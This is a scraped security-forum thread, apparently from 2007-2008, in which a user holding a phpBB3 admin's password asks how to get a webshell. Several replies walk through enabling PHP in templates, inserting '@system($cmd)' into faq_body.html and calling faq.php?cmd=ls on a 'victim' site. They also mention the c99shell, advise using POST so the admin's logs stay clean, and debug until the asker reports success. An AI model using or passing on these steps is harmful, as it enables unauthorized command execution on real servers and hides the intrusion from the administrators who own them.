Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
December 14, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 206
Members: 0
Total: 206
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb3 how to get webshell Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
phpbb3 how to get webshell
PostPosted: Fri Dec 07, 2007 1:46 am Reply with quote
akens
Regular user
Regular user
 
Joined: Dec 06, 2007
Posts: 22




i get a admin's pwd ,but i login it find can't get webshell
phpbb2 can upload .sql and Resume database,phpbb3 can't do it
who tell me a way?
thnx for you help!
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 1:34 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Admin panel-->Security settings Scroll down 'Allow php bla bla' put to ON.
Styles-->templates--->edit--->faq_blabla.html and put your code

<!-- PHP --> code <!-- ENDPHP -->

Then

http://victim.com/phpBB3/faq.php


Last edited by pexli on Fri Dec 07, 2007 9:41 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 2:29 pm Reply with quote
akens
Regular user
Regular user
 
Joined: Dec 06, 2007
Posts: 22




koko wrote:
koko wrote:
Admin panel-->Security settings Scroll down 'Allow php bla bla' put to ON.
Styles-->templates--->edit--->faq_blabla.html and put your code

<!-- PHP --> code <!-- END PHP -->


Then

http://victim.com/phpBB3/faq.php


thnx koko ,i will test!!
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 4:04 pm Reply with quote
akens
Regular user
Regular user
 
Joined: Dec 06, 2007
Posts: 22




I regret that I failed the test.
i change the code to c99shell,then visit faq.php,but it's not working!
Test environment:winxp+mysql5.0+php+phpbb3 v3.0.RC8

I would very much like to know that this is how the case

thnx again!
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 7:53 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




c99 sucks.Only lamers use this shell.Learn to use some sample code.Like

<?php echo "$cmd" ?>
<? system($cmd) ?>

This code work much much beter than your c99 and a'm not write in my post to delete all faq_blabla.html code and put your code in there.
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 1:02 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Tested on RC8 few min ago and working.
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 2:02 pm Reply with quote
akens
Regular user
Regular user
 
Joined: Dec 06, 2007
Posts: 22




According to your tips,I also tested a whole day, or not achieve the desired results.Insert code has indeed been Analysis,But does not seem to include in the faq.php.Do not know what went wrong steps.
my steps:
1:Admin panel-->Security settings -->allow php templates (yes)
2:Styles-->templates--->edit--->faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
i don't delete faq_blabla.html code
3:visit http://*****.com/phpBB3/faq.php?cmd=ls
Such steps are wrong?
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 3:23 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




akens wrote:
According to your tips,I also tested a whole day, or not achieve the desired results.Insert code has indeed been Analysis,But does not seem to include in the faq.php.Do not know what went wrong steps.
my steps:
1:Admin panel-->Security settings -->allow php templates (yes)
2:Styles-->templates--->edit--->faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
i don't delete faq_blabla.html code
3:visit http://*****.com/phpBB3/faq.php?cmd=ls
Such steps are wrong?


<!-- PHP --> @system($cmd) <!-- ENDPHP -->

You know diference of method POST and GET?If admin looks in logs will see something like this GET phpBB3/faq.php?cmd=ls and your shell will be deleted.
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 4:41 pm Reply with quote
akens
Regular user
Regular user
 
Joined: Dec 06, 2007
Posts: 22




i test only in my localhost!
GET OR POST to get shell influential?
The question now is the key to insert the normal implementation of the code
please forgive my ignorance, I will try to find some information to supplement knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue, thank you has been to my help!
if have a video ,I think I will progress faster Razz
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 9:32 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




akens wrote:
i test only in my localhost!
GET OR POST to get shell influential?
The question now is the key to insert the normal implementation of the code
please forgive my ignorance, I will try to find some information to supplement knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue, thank you has been to my help!
if have a video ,I think I will progress faster Razz


If "register_globals" is off, then you must access $_GET or $_POST directly anyway!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Dec 08, 2007 9:44 pm Reply with quote
akens
Regular user
Regular user
 
Joined: Dec 06, 2007
Posts: 22




Test success
thnx koko and Waraxe's help!
View user's profile Send private message
PostPosted: Sun Jun 01, 2008 9:15 pm Reply with quote
siurek22
Regular user
Regular user
 
Joined: May 31, 2008
Posts: 13




i have problem with it when i put your code site give me error
"Parse error: syntax error, unexpected '}' in /home/zycien/domains/zfn.pl/public_html/forum/includes/template.php(175) : eval()'d code on line 1"
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 1:22 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




Check the "}" are correct in the code. It seems there is one too many, or one out of place. If you have no idea what I'm talking about then post the code here and I will fix it.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Mon Jun 02, 2008 4:40 am Reply with quote
siurek22
Regular user
Regular user
 
Joined: May 31, 2008
Posts: 13




Code:
<!-- PHP -->
<? system($cmd); ?>
<!-- END PHP -->

i used this code and i don't know why it is that bexause in this code have any"}" :/
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 6:31 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




siurek22 remove <? ?> from code.
View user's profile Send private message
phpbb3 how to get webshell
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.089 Seconds